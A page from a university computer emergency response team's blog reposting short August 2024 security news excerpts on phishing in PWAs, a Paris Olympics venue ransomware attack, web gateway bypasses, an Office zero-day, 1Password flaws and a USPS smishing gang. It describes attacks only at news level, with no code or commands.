BU-CERT – Page 2 – Bournemouth University Computer Emergency Response Team

Be careful what you pwish for – Phishing in PWA applications

Posted on 24 August 2024

From welivesecurity.com

ESET analysts dissect a novel phishing method tailored to Android and iOS users.

[They] discovered a series of phishing campaigns targeting mobile users that used three different URL delivery mechanisms. These mechanisms include automated voice calls, SMS messages, and social media malvertising.

The voice call delivery is done via an automated call that warns the user about an out-of-date banking app and asks the user to select an option on the numerical keyboard. After pressing the correct button, a phishing URL is sent via SMS. This was reported in a tweet, by Michal Bláha.

Initial delivery by SMS was performed by sending messages indiscriminately to Czech phone numbers. The message sent included a phishing link and text to socially engineer victims into visiting the link.

Paris Olympics deals with ransomware attack

Posted on 9 August 2024

From scmagazine.com

A ransomware attack against the Paris Grand Palais exhibition hall, where Olympic events are being held, is being investigated.

According to MSN, a police investigation determined that the attackers targeted the institution’s central computer system, but the incident had not caused any disruption to Olympic events.

The computer system at the venue also handles data for 40 — mainly small — museums with which it is affiliated, the prosecutors said in an email.

Josh Jacobson, director of professional services at HackerOne called the attack unsurprising — but potentially quite creative. He said the outcome of this successful compromise could be beneficial to cybercriminals in a number of ways:

1) Because of the sheer number of venues that will be scrambling to get their operations up and running, the bad actors could be hoping to rake in ransoms across the victim pool and maximise financial gain.

Secure Web Gateways are anything but as infosec hounds spot dozens of bypasses

Posted on 9 August 2024

From theregister.com

Defcon Secure Web Gateways (SWGs) are an essential part of enterprise security, which makes it shocking to learn that every single SWG in the Gartner Magic Quadrant for SASE and SSE can reportedly be bypassed, allowing attackers to deliver malware without Gateways ever catching on.

Using a tactic he’s dubbed “last mile reassembly,” SquareX founder and long-time security researcher Vivek Ramachandran said he’s managed to suss out more than 25 different methods to bypass SWGs, all of which boil down to the same basic exploit: They miss a lot of what’s going on in modern web browsers.

“[SWGs] were invented almost 15, 17 years back [and] it all started as SSL intercepting proxies,” Ramachandran told us. “As cloud security became more important people built out this entire security stack in the cloud.

“This is really where the problem begins.”

SWGs, Ramachandran explains, are mostly relying on their ability to infer application layer attacks from network traffic before they make it to a web browser. If, say, the traffic wasn’t recognizable as malicious, the SWG might not detect it, instead delivering it to a user’s browser.

Microsoft researchers report Iran hackers targeting US officials before election

Posted on 9 August 2024

From reuters.com

WASHINGTON, Aug 9 (Reuters) – Microsoft researchers said on Friday that Iran government-tied hackers tried breaking into the account of a “high ranking official” on the U.S. presidential campaign in June, weeks after breaching the account of a county-level U.S. official.

The breaches were part of Iranian groups’ increasing attempts to influence the U.S. presidential election in November, the researchers said in a report that did not provide any further detail on the “official” in question.

The report follows recent statements by senior U.S. Intelligence officials that they’d seen Iran ramp up use of clandestine social media accounts with the aim to use them to try to sow political discord in the United States.

Iran’s mission to the United Nations in New York told Reuters in a statement that its cyber capabilities were “defensive and proportionate to the threats it faces” and that it had no plans to launch cyber attacks. “The U.S. presidential election is an internal matter in which Iran does not interfere,” the mission added in response to the allegations in the Microsoft report.

Microsoft discloses Office zero-day, still working on a patch

Posted on 9 August 2024

From bleepingcomputer.com

Microsoft has disclosed a high-severity zero-day vulnerability affecting Office 2016 and later, which is still waiting for a patch.

Tracked as CVE-2024-38200, this security flaw is caused by an information disclosure weakness that enables unauthorized actors to access protected information such as system status or configuration data, personal info, or connection metadata.

The zero-day impacts multiple 32-bit and 64-bit Office versions, including Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps for Enterprise.

Even though Microsoft’s exploitability assessment says that exploitation of CVE-2024-38200 is less likely, MITRE has tagged the likelihood of exploitation for this type of weakness as highly probable.

“In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability,” Microosoft’s advisory explains.

“However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file.”

The company is developing security updates to address this zero-day bug but has yet to announce a release date.

Critical 1Password flaws may allow hackers to snatch your passwords (CVE-2024-42219, CVE-2024-42218)

Posted on 9 August 2024

From helpnetsecurity.com

Two vulnerabilities (CVE-2024-42219, CVE-2024-42218) affecting the macOS version of the popular 1Password password manager could allow malware to steal secrets stored in the software’s vaults and obtain the account unlock key, AgileBits has confirmed.

Discovered by the Robinhood Red Team during a security assessment of 1Password for Mac and then privately reported to the software’s makers, the vulnerabilities have been fixed in two consecutive versions of the software: v8.10.36 (released on July 9) and v8.10.38 (released on August 6).

AgileBits says that they have received no reports that these issues were discovered or exploited by anyone else.

USPS Text Scammers Duped His Wife, So He Hacked Their Operation

Posted on 9 August 2024

From wired.com

The flood of text messages started arriving early this year. They carried a similar thrust: The United States Postal Service is trying to deliver a parcel but needs more details, including your credit card number. All the messages pointed to websites where the information could be entered.

Like thousands of others, security researcher Grant Smith got a USPS package message. Many of his friends had received similar texts. A couple of days earlier, he says, his wife called him and said she’d inadvertently entered her credit card details. With little going on after the holidays, Smith began a mission: Hunt down the scammers.

Over the course of a few weeks, Smith tracked down the Chinese-language group behind the mass-smishing campaign, hacked into their systems, collected evidence of their activities, and started a months-long process of gathering victim data and handing it to USPS investigators and a US bank, allowing people’s cards to be protected from fraudulent activity.